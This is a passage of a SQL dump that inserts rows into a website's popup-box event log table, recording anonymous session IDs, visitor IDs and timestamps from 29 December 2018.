(43728, '1a2a890c954bfe22d3e82de51fd62132', '83bb13387505b354', 0, 2, 1, '2018-12-29 10:35:00'),
(43729, '1a2a890c954bfe22d3e82de51fd62132', '83bb13387505b354', 0, 2, 1, '2018-12-29 10:36:07'),
(43730, '0e7a9938bdb257bd5dfa90a2656ca3bf', '492002d4731f76a8', 0, 2, 1, '2018-12-29 10:38:06'),
(43731, '5e61fad63446678e524c89a217f654a5', 'ee15d3d6defea2e0', 0, 2, 1, '2018-12-29 11:03:00'),
(43732, '5e61fad63446678e524c89a217f654a5', 'ee15d3d6defea2e0', 0, 2, 1, '2018-12-29 11:03:16'),
(43733, 'bf42b97daa710edd639a0e78fa4677a1', '83f3f9050d0f12fd', 0, 2, 1, '2018-12-29 11:08:53'),
(43734, '5649b257349eb7f84bd0e7aff6735efc', '1580e9ad649b9e7b', 0, 2, 1, '2018-12-29 11:09:01'),
(43735, 'f6adaebaef790fcec244f5c3a524b1ad', '11e6aced22c26021', 0, 2, 1, '2018-12-29 11:11:42'),
(43736, '9c3146a1c7fa1e66f22f92d03eecaefd', '45557f71f98e1e99', 0, 2, 1, '2018-12-29 11:23:32'),
(43737, '9c3146a1c7fa1e66f22f92d03eecaefd', '45557f71f98e1e99', 0, 2, 1, '2018-12-29 11:23:45'),
(43738, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:25:19'),
(43739, 'a84c08ea2590f1b0205321673cc2e6d4', 'bd21ad0986732513', 0, 2, 1, '2018-12-29 11:28:29'),
(43740, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:31:07'),
(43741, 'b8163dbaa396cae48e0a2ebec7a7fab5', '9968c5be4a7971a2', 0, 2, 1, '2018-12-29 11:32:41'),
(43742, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:34:16'),
(43743, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 11:34:21'),
(43744, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 11:34:51'),
(43745, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 11:35:26'),
(43746, 'b8163dbaa396cae48e0a2ebec7a7fab5', '9968c5be4a7971a2', 0, 2, 1, '2018-12-29 11:37:27'),
(43747, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:38:23'),
(43748, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:38:48'),
(43749, '6bebadc95c1eb0b20201db0441e4d7f1', '9127f533c5afc641', 0, 2, 1, '2018-12-29 11:39:34'),
(43750, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:40:02'),
(43751, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:40:23'),
(43752, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 11:40:26'),
(43753, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 11:40:47'),
(43754, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:40:48'),
(43755, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 11:41:09'),
(43756, '74fdaa9e223982b1fe4d13718228ae76', 'e8a31bb79b2541af', 0, 2, 1, '2018-12-29 11:41:27'),
(43757, 'bf42b97daa710edd639a0e78fa4677a1', '83f3f9050d0f12fd', 0, 2, 1, '2018-12-29 11:47:55'),
(43758, '84984859514567d5cb3aebe159804b0a', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-29 11:49:00'),
(43759, 'fd0505a5c28e3b34ad679fd33f487832', 'b53c70bea01d2d6e', 0, 2, 1, '2018-12-29 11:50:28'),
(43760, '84984859514567d5cb3aebe159804b0a', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-29 11:55:54'),
(43761, '33a5fcb61f1a0fbb46d7c50982989bb0', 'b3dc303f7a11cd2f', 0, 2, 1, '2018-12-29 11:58:40'),
(43762, 'bf3fbad1b679b460053c4ba780b02a6a', '91d3688e197526d0', 0, 2, 1, '2018-12-29 12:00:40'),
(43763, 'bf3fbad1b679b460053c4ba780b02a6a', '91d3688e197526d0', 0, 2, 1, '2018-12-29 12:00:57'),
(43764, 'a75bcb1525340a8c4d4acc5c34301992', '814e14b432590743', 0, 2, 1, '2018-12-29 12:02:17'),
(43765, '191bf46c09289d119d8484a84feb47f7', '51df446c19685386', 0, 2, 1, '2018-12-29 12:10:26'),
(43766, 'a617d7561379dc88305de3946f33e5e4', 'aa7f52140aee84b9', 0, 2, 1, '2018-12-29 12:12:02'),
(43767, 'a75bcb1525340a8c4d4acc5c34301992', '814e14b432590743', 0, 2, 1, '2018-12-29 12:12:04'),
(43768, '95becd42d1a0642fe4e6c4168c9b85a4', 'c520b35eb4576872', 0, 2, 1, '2018-12-29 12:16:10'),
(43769, '95becd42d1a0642fe4e6c4168c9b85a4', 'c520b35eb4576872', 0, 2, 1, '2018-12-29 12:16:23'),
(43770, '1e4667f1b9209177f7e853306360f9e2', '69748c55eb43d960', 0, 2, 1, '2018-12-29 12:19:16'),
(43771, 'c7b206c284ae787af910fd5d84b44d4f', '68d6262f427661c5', 0, 2, 1, '2018-12-29 12:21:27'),
(43772, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 12:24:23'),
(43773, '487964220978981aec2b10aa355bb64d', 'd131b6333aa3bbcb', 0, 2, 1, '2018-12-29 12:32:57'),
(43774, 'ce6a4a1d5dea52d48870bf5d2f48a9b3', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-29 12:33:47'),
(43775, '74488d8b76a36f34b7800d34ef33b56b', 'b5dea531bb51b38d', 0, 2, 1, '2018-12-29 12:43:35'),
(43776, '3f0206321ff40c207a114010f7772eff', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-29 12:54:01'),
(43777, '837b2a6bedfe6f5b7ba57f6267284966', '12e0aa0824788fbc', 0, 2, 1, '2018-12-29 12:56:43'),
(43778, 'dfd29d922508bda78195417b304d0b9d', 'e665f57d2b0af331', 0, 2, 1, '2018-12-29 13:03:38'),
(43779, 'a617d7561379dc88305de3946f33e5e4', 'aa7f52140aee84b9', 0, 2, 1, '2018-12-29 13:05:07'),
(43780, '49209f623e2d77b389788bbbec8333ff', 'b2dc36b5170519fe', 0, 2, 1, '2018-12-29 13:06:42'),
(43781, '837b2a6bedfe6f5b7ba57f6267284966', '12e0aa0824788fbc', 0, 2, 1, '2018-12-29 13:15:40'),
(43782, '3671abb64617acd1b27238486b4df3ef', '899fcdd284191954', 0, 2, 1, '2018-12-29 13:17:08'),
(43783, '837b2a6bedfe6f5b7ba57f6267284966', '12e0aa0824788fbc', 0, 2, 1, '2018-12-29 13:18:39'),
(43784, '837b2a6bedfe6f5b7ba57f6267284966', '12e0aa0824788fbc', 0, 2, 1, '2018-12-29 13:18:53'),
(43785, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 13:21:06'),
(43786, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 13:23:03'),
(43787, '837b2a6bedfe6f5b7ba57f6267284966', '12e0aa0824788fbc', 0, 2, 1, '2018-12-29 13:37:58'),
(43788, '3f0206321ff40c207a114010f7772eff', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-29 13:39:17'),
(43789, '837b2a6bedfe6f5b7ba57f6267284966', '12e0aa0824788fbc', 0, 2, 1, '2018-12-29 13:39:47'),
(43790, '837b2a6bedfe6f5b7ba57f6267284966', '12e0aa0824788fbc', 0, 2, 1, '2018-12-29 13:40:00'),
(43791, '837b2a6bedfe6f5b7ba57f6267284966', '12e0aa0824788fbc', 0, 2, 1, '2018-12-29 13:42:59'),
(43792, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 13:46:25'),
(43793, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 13:47:01'),
(43794, '88945a72dd9ce8985bde0dc40ebf73ed', '4df5ced8675ad994', 0, 2, 1, '2018-12-29 13:47:17'),
(43795, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 13:47:37'),
(43796, '963d29a74fe379510ce4ff38e919b036', '7cea006f2491ebc6', 0, 2, 1, '2018-12-29 13:59:42'),
(43797, '2826cd4e90d8c861df51bdcb01493849', '0c3b18a297f7fa46', 0, 2, 1, '2018-12-29 14:00:43'),
(43798, '963d29a74fe379510ce4ff38e919b036', '7cea006f2491ebc6', 0, 2, 1, '2018-12-29 14:01:07'),
(43799, 'cfc0b70367773f75b3bd84bc8684e1cc', '142694e678124c3e', 0, 2, 1, '2018-12-29 14:11:08'),
(43800, 'cfc0b70367773f75b3bd84bc8684e1cc', '142694e678124c3e', 0, 2, 1, '2018-12-29 14:11:26'),
(43801, 'cfc0b70367773f75b3bd84bc8684e1cc', '142694e678124c3e', 0, 2, 1, '2018-12-29 14:12:10'),
(43802, 'cfc0b70367773f75b3bd84bc8684e1cc', '142694e678124c3e', 0, 2, 1, '2018-12-29 14:12:35');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(43803, 'ca22af087de8f979e81b471f01e22f76', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-12-29 14:12:48'),
(43804, '5c22a1479c5a1189cd973c9d736479ae', '3f8bdd1b98d2babd', 0, 2, 1, '2018-12-29 14:14:09'),
(43805, '03d44f713f6b31441239d093d233deeb', 'cf2675a23ca8aba0', 0, 2, 1, '2018-12-29 14:15:04'),
(43806, 'cfc0b70367773f75b3bd84bc8684e1cc', '142694e678124c3e', 0, 2, 1, '2018-12-29 14:15:24'),
(43807, 'cfc0b70367773f75b3bd84bc8684e1cc', '142694e678124c3e', 0, 2, 1, '2018-12-29 14:16:09'),
(43808, '186a4d2624ebf2f41acd298b151e8dd8', '0c3b18a297f7fa46', 0, 2, 1, '2018-12-29 14:22:31'),
(43809, '36caaaabc33292ea4dcbe02a47b9a58d', 'ed632056c571baf6', 0, 2, 1, '2018-12-29 14:27:15'),
(43810, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-29 14:36:34'),
(43811, 'be1a8db176d6be564305c1cbfa185e1f', '89872404186e372a', 0, 2, 1, '2018-12-29 14:37:25'),
(43812, 'bf69666dac8a45305d1931d109988311', '72d8b2752221f63d', 0, 2, 1, '2018-12-29 14:39:02'),
(43813, '8cbe56242f95e3bdba1c34b91357703e', '02829647d6d6d42d', 0, 2, 1, '2018-12-29 14:39:46'),
(43814, '55825e9d38a95a75ee1fb2c270ed66d9', '11e6aced22c26021', 0, 2, 1, '2018-12-29 14:41:39'),
(43815, '47b67d578ae34ca32ca41fb0671a0b28', '754387d5c3a7836c', 0, 2, 1, '2018-12-29 15:02:58'),
(43816, '9756784bb71c1a2b300009b87d7864f1', 'b62eafe5c61e0544', 0, 2, 1, '2018-12-29 15:03:30'),
(43817, 'be1a8db176d6be564305c1cbfa185e1f', '89872404186e372a', 0, 2, 1, '2018-12-29 15:04:21'),
(43818, '47b67d578ae34ca32ca41fb0671a0b28', '754387d5c3a7836c', 0, 2, 1, '2018-12-29 15:04:52'),
(43819, 'f51186621fa7ae2cb0c6659991cd3b76', 'b89c95edc0c31f76', 0, 2, 1, '2018-12-29 15:05:50'),
(43820, 'f51186621fa7ae2cb0c6659991cd3b76', 'b89c95edc0c31f76', 0, 2, 1, '2018-12-29 15:06:05'),
(43821, '9756784bb71c1a2b300009b87d7864f1', 'b62eafe5c61e0544', 0, 2, 1, '2018-12-29 15:06:32'),
(43822, 'c53ee21f689e3a5505a9749ce2cb951b', '4727f9281a8da559', 0, 2, 1, '2018-12-29 15:06:58'),
(43823, '47b67d578ae34ca32ca41fb0671a0b28', '754387d5c3a7836c', 0, 2, 1, '2018-12-29 15:07:28'),
(43824, 'c53ee21f689e3a5505a9749ce2cb951b', '4727f9281a8da559', 0, 2, 1, '2018-12-29 15:08:24'),
(43825, '7bf6f8616859cfcb5c1bd76f35e641ce', '16d2e6e92c47b8e6', 0, 2, 1, '2018-12-29 15:14:25'),
(43826, '2883209f4e7c9678b29823d0035ae5af', 'de427a3d6b8143ad', 0, 2, 1, '2018-12-29 15:20:03'),
(43827, '47b67d578ae34ca32ca41fb0671a0b28', '754387d5c3a7836c', 0, 2, 1, '2018-12-29 15:20:38'),
(43828, '83225f387d86cd60e216974b47e38ee7', '46713cac27a94b83', 0, 2, 1, '2018-12-29 15:23:34'),
(43829, '4c91e40f1c257150d241386ef89f261b', '4c07673592205f17', 0, 2, 1, '2018-12-29 15:24:03'),
(43830, '527d3496829088d014cad6c1b511c17b', 'b62eafe5c61e0544', 0, 2, 1, '2018-12-29 15:24:54'),
(43831, '4c91e40f1c257150d241386ef89f261b', '4c07673592205f17', 0, 2, 1, '2018-12-29 15:26:02'),
(43832, '47b67d578ae34ca32ca41fb0671a0b28', '754387d5c3a7836c', 0, 2, 1, '2018-12-29 15:26:05'),
(43833, '527d3496829088d014cad6c1b511c17b', 'b62eafe5c61e0544', 0, 2, 1, '2018-12-29 15:26:09'),
(43834, '4c91e40f1c257150d241386ef89f261b', '4c07673592205f17', 0, 2, 1, '2018-12-29 15:26:25'),
(43835, 'c3938e4e1afba75946f101597aa0023e', 'a1c6674e2d316581', 0, 2, 1, '2018-12-29 15:26:38'),
(43836, 'c3938e4e1afba75946f101597aa0023e', 'a1c6674e2d316581', 0, 2, 1, '2018-12-29 15:27:42'),
(43837, '3f0206321ff40c207a114010f7772eff', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-29 15:28:28'),
(43838, '31062164e0ecb4c52f834afd0e68a266', 'b53c70bea01d2d6e', 0, 2, 1, '2018-12-29 15:36:22'),
(43839, '290a1fb0fff5cccb22ff8ad5dd487d2d', '3a538a21e49df187', 0, 2, 1, '2018-12-29 15:39:37'),
(43840, '290a1fb0fff5cccb22ff8ad5dd487d2d', '3a538a21e49df187', 0, 2, 1, '2018-12-29 15:41:12'),
(43841, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 15:41:25'),
(43842, '56c2ae80d0f00507ac40c382ffeb56c8', '02829647d6d6d42d', 0, 2, 1, '2018-12-29 15:41:33'),
(43843, '83225f387d86cd60e216974b47e38ee7', '46713cac27a94b83', 0, 2, 1, '2018-12-29 15:41:35'),
(43844, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 15:41:43'),
(43845, '290a1fb0fff5cccb22ff8ad5dd487d2d', '3a538a21e49df187', 0, 2, 1, '2018-12-29 15:42:10'),
(43846, '672c06f2bb9570f00c358c59fa04628a', '4c07673592205f17', 0, 2, 1, '2018-12-29 15:43:47'),
(43847, 'dff5c18e2f03e8905cbca2d8a4d9f0c6', '5aec731831311ef8', 0, 2, 1, '2018-12-29 15:44:06'),
(43848, 'be39b3f11f2e39c8a9bd74183c4f6949', 'af1c5cc59dc7b877', 0, 2, 1, '2018-12-29 15:44:35'),
(43849, '672c06f2bb9570f00c358c59fa04628a', '4c07673592205f17', 0, 2, 1, '2018-12-29 15:45:05'),
(43850, 'be39b3f11f2e39c8a9bd74183c4f6949', 'af1c5cc59dc7b877', 0, 2, 1, '2018-12-29 15:45:21'),
(43851, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 15:46:32'),
(43852, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 15:47:32'),
(43853, '16885e6f6627cffeb3e535456b1cf365', '5aec731831311ef8', 0, 2, 1, '2018-12-29 15:47:34'),
(43854, '235e442b788be598be556a2292066077', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-29 15:50:16'),
(43855, 'e437bb08d2aa847661e0390e2ddcd507', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-29 15:50:38'),
(43856, '235e442b788be598be556a2292066077', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-29 15:50:47'),
(43857, 'e437bb08d2aa847661e0390e2ddcd507', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-29 15:51:17'),
(43858, 'c86e27af10a82c5d60987eb95413e4e4', 'df27b9a2919a8206', 0, 2, 1, '2018-12-29 15:51:26'),
(43859, 'c86e27af10a82c5d60987eb95413e4e4', 'df27b9a2919a8206', 0, 2, 1, '2018-12-29 15:51:56'),
(43860, '235e442b788be598be556a2292066077', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-29 15:51:59'),
(43861, '6e1dc6cf0c06dc6d6e36be24f6269641', 'af1c5cc59dc7b877', 0, 2, 1, '2018-12-29 15:52:37'),
(43862, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-29 15:53:23'),
(43863, 'e437bb08d2aa847661e0390e2ddcd507', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-29 15:53:27'),
(43864, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-29 15:53:48'),
(43865, '235e442b788be598be556a2292066077', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-29 15:55:36'),
(43866, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 15:57:40'),
(43867, 'f7f6597372bf4162313862521458d024', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-29 15:57:54'),
(43868, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 15:58:03'),
(43869, '6e1dc6cf0c06dc6d6e36be24f6269641', 'af1c5cc59dc7b877', 0, 2, 1, '2018-12-29 15:58:38'),
(43870, '4d3febd2a71239b2d1d588e0617661aa', 'd83be9192f556fc0', 0, 2, 1, '2018-12-29 15:59:59'),
(43871, 'b468c7e2b5d9dd9e932da510e28fc839', '8dcfec730c1c50c4', 0, 2, 1, '2018-12-29 16:01:10'),
(43872, '0d7090d1eb598063a9f74fb31849ec9c', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-29 16:01:33'),
(43873, '4d3febd2a71239b2d1d588e0617661aa', 'd83be9192f556fc0', 0, 2, 1, '2018-12-29 16:01:57'),
(43874, '6b6b179423f2a0c9f363cb11f7dbf2ec', '1c68b977b911188c', 0, 2, 1, '2018-12-29 16:02:06'),
(43875, '9c3146a1c7fa1e66f22f92d03eecaefd', '45557f71f98e1e99', 0, 2, 1, '2018-12-29 16:02:15'),
(43876, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-29 16:02:29'),
(43877, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 16:02:40'),
(43878, '9c3146a1c7fa1e66f22f92d03eecaefd', '45557f71f98e1e99', 0, 2, 1, '2018-12-29 16:02:44'),
(43879, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 16:03:05'),
(43880, '56c2ae80d0f00507ac40c382ffeb56c8', '02829647d6d6d42d', 0, 2, 1, '2018-12-29 16:03:24'),
(43881, 'c86e27af10a82c5d60987eb95413e4e4', 'df27b9a2919a8206', 0, 2, 1, '2018-12-29 16:03:52'),
(43882, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-29 16:03:57'),
(43883, 'e437bb08d2aa847661e0390e2ddcd507', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-29 16:04:31'),
(43884, '79fd5343f283f16b63856feff6f056db', '9701e765e0799d90', 0, 2, 1, '2018-12-29 16:07:02'),
(43885, '95becd42d1a0642fe4e6c4168c9b85a4', 'c520b35eb4576872', 0, 2, 1, '2018-12-29 16:07:31'),
(43886, '9820094dcad2c90ed8acfa79bb8ba3e6', 'ff674f5b621b97d9', 0, 2, 1, '2018-12-29 16:07:53'),
(43887, 'bc907da94fc03c1fb0194ea55db62d99', '2b4b26d386957b28', 0, 2, 1, '2018-12-29 16:08:52'),
(43888, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 16:09:02'),
(43889, '16885e6f6627cffeb3e535456b1cf365', '5aec731831311ef8', 0, 2, 1, '2018-12-29 16:09:31'),
(43890, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 16:09:50'),
(43891, '16885e6f6627cffeb3e535456b1cf365', '5aec731831311ef8', 0, 2, 1, '2018-12-29 16:09:52'),
(43892, 'fdf25b57d1e56706931d713a18faa2cb', 'c5e6f9b672126876', 0, 2, 1, '2018-12-29 16:10:21'),
(43893, 'fdf25b57d1e56706931d713a18faa2cb', 'c5e6f9b672126876', 0, 2, 1, '2018-12-29 16:10:28'),
(43894, '22ee0758881cf812c26874e6d2e7ad7a', '60ed72c979f92224', 0, 2, 1, '2018-12-29 16:10:46'),
(43895, '199b442a44e5368ea6b62eb8015c5d34', 'c76d8325ca7834be', 0, 2, 1, '2018-12-29 16:11:22'),
(43896, '83225f387d86cd60e216974b47e38ee7', '46713cac27a94b83', 0, 2, 1, '2018-12-29 16:12:19'),
(43897, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 16:12:50'),
(43898, '31062164e0ecb4c52f834afd0e68a266', 'b53c70bea01d2d6e', 0, 2, 1, '2018-12-29 16:12:59'),
(43899, 'eaf784aab0b042184b2ca5d52d174c35', 'cf1ed0e204f84db2', 0, 2, 1, '2018-12-29 16:13:49'),
(43900, 'e06cade3e82166e1150cac0b0da860f9', '70df5ba7bd3f1512', 0, 2, 1, '2018-12-29 16:13:57'),
(43901, 'cf88f6effda6f46390af600d87062361', '34ec142c805c34fe', 0, 2, 1, '2018-12-29 16:14:45'),
(43902, 'cf88f6effda6f46390af600d87062361', '34ec142c805c34fe', 0, 2, 1, '2018-12-29 16:14:54'),
(43903, '618f0a1521f17b76ee6433adbe96814b', '0530018377078939', 0, 2, 1, '2018-12-29 16:15:05'),
(43904, 'cf88f6effda6f46390af600d87062361', '34ec142c805c34fe', 0, 2, 1, '2018-12-29 16:17:51'),
(43905, '4ce3460d8e5b9d5d8ad05a412309f7c9', '0f52fc3c1a51cce2', 0, 2, 1, '2018-12-29 16:18:59'),
(43906, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-29 16:21:08'),
(43907, '3f0206321ff40c207a114010f7772eff', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-29 16:21:11'),
(43908, 'a7fe519655648ab5544f37fea38a5869', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-29 16:21:15'),
(43909, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 16:26:44'),
(43910, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 16:27:05'),
(43911, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-29 16:27:26'),
(43912, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-29 16:27:37'),
(43913, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 16:28:15'),
(43914, '58f6aa05bc0b35bc27a473d114d6863d', '9fa71c818742c95f', 0, 2, 1, '2018-12-29 16:28:26'),
(43915, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 16:32:02'),
(43916, '0c23aa057f69ddf2eb09cc87534a0b23', '33c0af73ba240498', 0, 2, 1, '2018-12-29 16:33:59'),
(43917, 'c32ea1f5c7d86c960456f68c83e1c899', '7b16863d40230e2a', 0, 2, 1, '2018-12-29 16:37:16'),
(43918, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 16:38:32'),
(43919, 'f7f6597372bf4162313862521458d024', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-29 16:39:32'),
(43920, '6647a86677fd733d1078a6a781acf845', '7501b42c35accff7', 0, 2, 1, '2018-12-29 16:41:48'),
(43921, '8ad6f56dfebda3febb9924a3a0757af8', 'db026c3d7c547818', 0, 2, 1, '2018-12-29 16:42:30'),
(43922, '24f6b27c46f8aeafae689b4c6dc5e96c', '4765b5e8fd392dd4', 0, 2, 1, '2018-12-29 16:44:58'),
(43923, '94d29b6c24725ce4faefb18e5ba330cc', '6e117bd555667400', 0, 2, 1, '2018-12-29 16:45:19'),
(43924, '8ad6f56dfebda3febb9924a3a0757af8', 'db026c3d7c547818', 0, 2, 1, '2018-12-29 16:47:05'),
(43925, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 16:48:50'),
(43926, '7cac153c0e80586ed01af4a051719ce7', '30241a723d4ba055', 0, 2, 1, '2018-12-29 16:49:20'),
(43927, '8ad6f56dfebda3febb9924a3a0757af8', 'db026c3d7c547818', 0, 2, 1, '2018-12-29 16:49:26'),
(43928, '8ad6f56dfebda3febb9924a3a0757af8', 'db026c3d7c547818', 0, 2, 1, '2018-12-29 16:50:15'),
(43929, 'ec9a5e9832adb5d1e3585efc54ec0f20', '2034f09284a4c7ca', 0, 2, 1, '2018-12-29 16:52:03'),
(43930, '1a2a890c954bfe22d3e82de51fd62132', '83bb13387505b354', 0, 2, 1, '2018-12-29 16:52:11'),
(43931, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 16:52:52'),
(43932, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 16:53:07'),
(43933, '9820094dcad2c90ed8acfa79bb8ba3e6', 'ff674f5b621b97d9', 0, 2, 1, '2018-12-29 16:53:08'),
(43934, 'a7fe519655648ab5544f37fea38a5869', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-29 16:56:39'),
(43935, '27bbf7d5c409b8b226c0fb441165bdcb', 'bd21ad0986732513', 0, 2, 1, '2018-12-29 16:57:50'),
(43936, '27bbf7d5c409b8b226c0fb441165bdcb', 'bd21ad0986732513', 0, 2, 1, '2018-12-29 16:58:35'),
(43937, '13996d5f0b525760e9002084d3adbe99', '93e2db65e265e2d6', 0, 2, 1, '2018-12-29 17:00:17'),
(43938, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 17:01:42'),
(43939, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 17:01:52'),
(43940, '27bbf7d5c409b8b226c0fb441165bdcb', 'bd21ad0986732513', 0, 2, 1, '2018-12-29 17:02:10'),
(43941, '01d4b2b44ce978653f015e9faf181093', '3233431a244017cd', 0, 2, 1, '2018-12-29 17:07:19'),
(43942, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-29 17:09:30'),
(43943, 'e06cade3e82166e1150cac0b0da860f9', '70df5ba7bd3f1512', 0, 2, 1, '2018-12-29 17:10:07'),
(43944, 'bf69666dac8a45305d1931d109988311', '72d8b2752221f63d', 0, 2, 1, '2018-12-29 17:11:09'),
(43945, '412ade117ee0a6b7372f39aa54d36c5c', 'a5cf2bfb37ea569d', 0, 2, 1, '2018-12-29 17:11:28'),
(43946, '4ce3460d8e5b9d5d8ad05a412309f7c9', '0f52fc3c1a51cce2', 0, 2, 1, '2018-12-29 17:12:05'),
(43947, '33649f4a4ac42d307253f7b26c990e32', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-29 17:17:04'),
(43948, '05e35a21dd39e61db681d7b8a3180aa0', '1d820d28499c8c31', 0, 2, 1, '2018-12-29 17:17:06'),
(43949, '05e35a21dd39e61db681d7b8a3180aa0', '1d820d28499c8c31', 0, 2, 1, '2018-12-29 17:17:46'),
(43950, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 17:18:59'),
(43951, '91c9fdbcd1466291fd81b3d1d6d4b709', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-29 17:19:29'),
(43952, 'ddfd7b65f18a997fd167ce4bfed41255', 'e3454d790deac400', 0, 2, 1, '2018-12-29 17:21:46'),
(43953, '78848d92671e7f91341234d05c117ad9', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-29 17:30:26'),
(43954, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-29 17:30:38'),
(43955, '3b8e6861a8c0b5766829efec4949ce2e', 'c850ddd512532e36', 0, 2, 1, '2018-12-29 17:30:59'),
(43956, '235e442b788be598be556a2292066077', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-29 17:31:01'),
